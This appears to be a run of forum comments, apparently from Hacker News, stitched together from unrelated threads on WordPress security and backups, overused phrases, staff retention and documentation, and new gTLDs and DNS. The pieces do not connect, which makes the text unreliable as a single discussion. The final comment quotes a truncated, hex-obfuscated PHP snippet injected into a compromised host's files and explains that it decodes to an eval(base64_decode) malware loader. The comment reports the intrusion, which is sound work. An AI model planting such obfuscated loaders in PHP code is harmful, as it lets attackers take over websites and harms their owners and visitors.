Avoid Wordpress...really? I can understand avoiding shared hosts because you have less control of the environment but going to an alternative blogging platform because it is more obscure than Wordpress seems to be a bad approach (and if you go with a vps solution you might have the headaches of maintaining a secure distro). This is like saying "you should use Linux or Mac because Windows gets attacked more".
Any piece of software that is popular (I saw a recent statistic that wordpress powers %10 of the top 1 million sites as ranked by Alexa) will be much more vulnerable to attack than less popular software. At the same time, you get a bigger community and all the goodies that come along with that popularity (more plug-ins, themes, etc...).
I don't think that getting rid of the software is the correct approach in this case. You need to approach it by assuming that your wordpress site will be attacked every day and you need to have a plan to remediate this. There is no perfect security unless you unplug your web server from the internet. For a one blogger site - one simple approach would be to:
1. Run something like open source tripwire (http://sourceforge.net/projects/tripwire/) on a nightly basis so you can get alerted if any wordpress files get changed (HN peoplez: anyone have a better tripwire-ish solution that is free?)
2. Run a nightly backup of your files and db and mail it to an external account (like a gmail account)
3. have a script that can reload your files and database quickly from your backups (obviously - this needs to be tested)
I agree that Wordpress gets attacked more, and has more vulnerabilities uncovered, because it is popular. Unfortunately, that isn't the only reason. It is the same worst-of-both-worlds combination that WinXP SP 1 was in 2003.
Infrequent bugs are a feature, they keep users from having to upgrade their software, which is annoying. That's why I avoid Wordpress.
I've never looked at the WP codebase, but I'm just flabbergasted that a piece of blogging software that's been around this long has so many holes. Anyone who just wants to run a simple blog with minimum hassle on a VPS is terribly ill served by Wordpress.
Lately, I've been seeing "having said that, ..." or "that being said, ...", a little much in comments and blog posts. Having said that, I'm trying to avoid it myself.
Just noticed that jackowayed below has a variation of it in his comment.
First time I can recall seeing "Dead Simple" is on Posterous. I think we're just used to everything being overly complicated so that anything that's simple is by definition "dead simple". Simple by itself is naked and unsophisticated. Dead simple on the other hand is special.
People leave because they get bored, so they would switch teams from time to time, give new responsibilities and try to keep everyone motivated. Didn't always work, but they managed to keep some top guys for very long...
I personally believe that "you will be given more challenging work" should be the reason to be given for documenting stuff, rather than "I know you will quit one day".
Not wanting to be interrupted, to know how things work, when you are working on your next interesting stuff, is reason enough to make things better maintainable.
I personally held that belief and worked through such challenges for over 8 years, until I got bored switching teams and creating new stuff for my employer. I now do the "creating new stuff" for myself at my startup.
If the talent is trying to make itself irreplaceable - like say, only one person knows how something works and they do not like documenting it or training others. It shows insecurity of the person who does not want to lose the job, which is bad for the organization as well as for the person.
Bad for the organization because, if the person either wants to quit or cannot turn up for work, a crucial piece of work cannot be completed.
Bad for the person because, though the person might think he/she is crucial for something work and cannot be fired, they are making themselves tied up to the work and hence cannot be promoted to better opportunities.
A talent should learn and grow. And then to teach others and make them grow. And keep repeating the process. If there is not much you can learn to grow, then quit and join some place where you can.
There's nothing technical DNS-wise that would prevent the name 'canon' from resolving to an IP address, so http://canon could work. They could also add a MX record for the name 'canon' so @canon e-mail addresses would work too. Maybe ICANN has rules around gTLDs that would prevent this type of use?
I wish people would stop posting that. Yes, that covers most (though not all) of the RFC definitions of what constitutes an email address, but in practice you only want to accept a tiny subset of those.
Well, the really simple example is the string "postmaster". It is a perfectly legitimate email address, and almost always deliverable. But rarely something you want to actually accept.
Most lesser-known TLDs with a central registrar already do this by giving themselves the www.TLD. record; for example http://www.tv/ or http://www.name/. When you try just "tv./" or "name./" in your browser, it'll try those as well, without having to muddy up the main record.
http://canon/ would refer to whatever canon was local to your gateway's DNS host record (I believe; I can't find the exact term for it.) For example, my computer is d207-6-247-238.bchsia.telus.net. If I type "canon" into anything that calls gethostbyname(), it assumes I mean canon.bchsia.telus.net. When that doesn't resolve, then it tries "canon."
http://canon./, on the other hand, refers to the "canon" that is located at the "root directory" of the internet—that is, ".". Most addresses don't need this, because once you specify any more than a host name, it assumes the rest of the domain "path" is a fully-qualified DNS record, and doesn't bother checking your local network for it.
I don't hate it, indeed I like the idea of.anigbrowl or so :-)
I think domain names themselves are transient, in recent years I find myself doing things like searching for 'Canon camera' and letting Chrome and Google take care of the routing.
This post automatically generated by Google.com in response to inarticulate mumblings by user anigbrowl
Actually http://canon./ (http://canon/ would also work in rare cases (No DNS search domain set and the browser also doesn't try to interpret it as a keyword.))
Or is the end (eventually) for the squatting game? When there are hundreds or thousands of alternatives for xyz.com, won't that seriously diminish the worth of any one in particular?
it is not a domain squatter's dream come true, it is the DNS bureaucracy cabal's dream come true.
It has little value for users/consumers (i.e., won't remember if they want canon.com or canon.canon). It has little value for businesses, because it means more time and money monitoring for domain squatting and trademark infringement. It provides yet another playing field for scammers and other predators.
The only benefit is to the upper levels in the DNS hiearchy, gives them more revenue to perpetuate themselves and to come up with more user-hostile ideas.
I agree, and as I said, it really doesn't matter. The vast majority of people are going to get what they need through Google, and to a lessor extent, the other search engines.
The blog doesn't give any numbers, but it seems that a few of their shared servers were compromised, so a few thousand of sites at least.
One of my clients still host in there and her files were all modified around 1pm today.
What I find unusual is the kind of code added to all PHP files:
" $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f.. \x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";.. $_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY.. "
If you decode that, it is an encoded "eval(base64_decode" to load the malware as hidden as possible.